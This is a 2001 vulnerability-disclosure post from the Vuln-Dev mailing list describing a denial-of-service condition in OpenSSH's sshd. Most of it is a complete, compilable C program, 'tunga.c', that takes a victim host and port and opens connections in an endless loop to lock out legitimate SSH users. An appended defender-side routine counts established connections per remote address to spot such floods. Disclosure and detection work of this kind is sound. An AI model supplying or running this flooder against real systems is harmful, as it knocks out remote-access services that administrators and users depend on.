Vulnerability Development mailing list archives
Possible OpenSSH DoS Attack
From: "Pedro Inacio" <drbrain () phibernet org>
Date: Mon, 10 Dec 2001 23:19:18 -0000
--[ OpenSSH DoS Attack proof of concept ]--

by DrBrain <drbrain () phibernet org> / http://www.phibernet.org

--[ Intro ]--

After some tests with sshd, I have noticed that it is possible to generate a DoS attack that gives you the following message when you try to contact the service:

----------
$ ssh user () somehost com
ssh_exchange_identification: Connection closed by remote host
----------

This just happens while running the code below, because when you stop running it everything works fine.

It seems to be a known problem ( http://www.snailbook.com/faq/libwrap-oops.auto.html ), but until now there is no patch available and this problem is present in all OpenSSH versions. Although, there is an advisory to compile the SSH server with libwrap (TCP-wrappers) support and then add some rules in /etc/hosts.{allow,deny} in order to allow connections to sshd from any source address.

Anyway, I have made some tests and ALL the machines were vulnerable. In my opinion it is urgent to fix this as soon as possible.

--[ Code ]--

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main (int argc, char *argv[]) {
  int sd, rc;
  struct sockaddr_in localAddr, servAddr;
  struct linger ling;
  struct hostent *h;

  if(argc < 3) {
    printf("tunga.c - OpenSSH DoS Attack\n");
    printf("by DrBrain <drbrain () phibernet org>\n");
    printf("Phibernet Information Network < http://www.phibernet.org\n\n");
    printf("Usage: %s <victim> <port>\n\n",argv[0]);
    exit(1);
  }

  h = gethostbyname(argv[1]);
  if(h==NULL) {
    printf("%s: Unknown Host '%s'\n",argv[0],argv[1]);
    exit(1);
  }

  for(;;) {
    servAddr.sin_family = h->h_addrtype;
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
    servAddr.sin_port = htons(atoi(argv[2]));

    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd<0) {
      perror("Cannot Open Socket ");
      exit(1);
    }

    rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
    if(rc<0) {
      perror("Cannot Connect ");
      exit(1);
    }
  }
  exit(0);
}

That's it!

I would like to thank megas and FatZU and all the guys in Phibernet for helping me with some machines while testing the DoS.

--
DrBrain
"If you don't have a hammer, hack it" ;)
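A defender-side check for the condition reported in the message above, added here as an example; it is not part of the original post and not OpenSSH code. It counts established connections to the sshd port per remote address in a table laid out like Linux /proc/net/tcp and reports sources above a limit. The function name, the limit and the sample rows are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
enum { TCP_ESTABLISHED = 0x01, MAX_SOURCES = 64 };  /* 0x01: "st" column value */
struct source { unsigned addr; int conns; };

/* Constructed sample (not captured data), /proc/net/tcp column order; 0x0016 = port 22. */
static const char SAMPLE[] =
    "  sl  local_address rem_address   st\n"
    "   0: 00000000:0016 00000000:0000 0A\n"
    "   1: 0A00000A:0016 6400000A:C350 01\n"
    "   2: 0A00000A:0016 6400000A:C351 01\n"
    "   3: 0A00000A:0016 6400000A:C352 01\n"
    "   4: 0A00000A:0016 6500000A:D001 01\n"
    "   5: 0A00000A:0050 6400000A:C400 01\n";

/* Write to out[] each remote address holding more than `limit` established
   connections to local `port`; returns the number of entries written. */
int sources_over_limit(const char *table, unsigned port, int limit,
                       struct source *out, int max_out)
{
    struct source seen[MAX_SOURCES];
    int nseen = 0, nout = 0, i;
    char line[128];
    while (*table) {
        size_t len = strcspn(table, "\n");
        unsigned lport, raddr, st;
        snprintf(line, sizeof line, "%.*s", (int)len, table);  /* one row */
        table += len + (table[len] == '\n');
        if (sscanf(line, " %*d: %*X:%X %X:%*X %X", &lport, &raddr, &st) != 3
            || lport != port || st != TCP_ESTABLISHED)
            continue;            /* header, malformed row, other port or state */
        for (i = 0; i < nseen && seen[i].addr != raddr; i++)
            ;
        if (i == MAX_SOURCES)
            continue;            /* table full, new source not tracked */
        if (i == nseen)
            seen[nseen++] = (struct source){ raddr, 0 };
        seen[i].conns++;
    }
    for (i = 0; i < nseen && nout < max_out; i++)
        if (seen[i].conns > limit)
            out[nout++] = seen[i];
    return nout;
}

int main(void)
{
    struct source hit[8];
    for (int n = sources_over_limit(SAMPLE, 22, 2, hit, 8); n-- > 0; )
        printf("%08X holds %d connections\n", hit[n].addr, hit[n].conns);
}
```

On a live Linux host the same function can be fed the contents of /proc/net/tcp, where addresses appear as raw hex in host byte order.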